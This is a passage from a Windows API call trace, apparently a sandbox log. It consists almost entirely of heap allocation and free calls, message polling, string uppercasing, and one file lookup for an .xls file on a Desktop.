hHeap=0x2af0000) returned 1 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71de8 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0089.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0089.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0089.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0089.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0089.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0089.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0089.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0089.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0089.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0089.620] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0089.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0089.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0089.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0089.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0089.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0089.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0089.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0089.620] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0089.620] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0089.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0089.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0089.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0089.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0089.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0089.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0089.620] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0089.621] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0089.621] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0089.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0089.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0089.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0089.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0089.621] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0089.621] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0089.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0089.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0089.622] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0089.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0089.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0089.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0089.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0089.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0089.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0089.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0089.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0089.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0089.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0089.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0089.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0089.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0089.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0089.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0089.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0089.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0089.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0089.622] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0089.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0089.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0089.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0089.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0089.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0089.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0089.622] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0089.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0089.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0089.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0089.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0089.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0089.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0089.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0089.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0089.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0089.623] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0089.623] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0089.623] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0089.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0089.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0089.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0089.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0089.624] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0089.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0089.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0089.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0089.624] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0089.624] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0089.624] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/BlDya8Gp-4HPz6uNsS.xls", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2336d40, ftCreationTime.dwHighDateTime=0x1d5d3d8, ftLastAccessTime.dwLowDateTime=0xb1ce5320, ftLastAccessTime.dwHighDateTime=0x1d5d3e8, ftLastWriteTime.dwLowDateTime=0xb1ce5320, ftLastWriteTime.dwHighDateTime=0x1d5d3e8, nFileSizeHigh=0x0, nFileSizeLow=0xd39f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlDya8Gp-4HPz6uNsS.xls", cAlternateFileName="BLDYA8~1.XLS")) returned 0x9a3e40 [0089.625] FindClose (in: hFindFile=0x9a3e40 | out: hFindFile=0x9a3e40) returned 1 [0089.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0089.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0089.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0089.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0089.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0089.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0089.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0089.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0089.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0089.625] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0089.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0089.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0089.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0089.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0089.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0089.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0089.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0089.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0089.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0089.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0089.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0089.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0089.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0089.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0089.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0089.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0089.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0089.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0089.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0089.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0089.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0089.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0089.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0089.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0089.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0089.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0089.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0089.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0089.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0089.626] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0089.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0089.626] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0089.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0089.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0089.626] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0089.626] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0089.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0089.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0089.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0089.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0089.627] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0089.627] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0089.627] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: 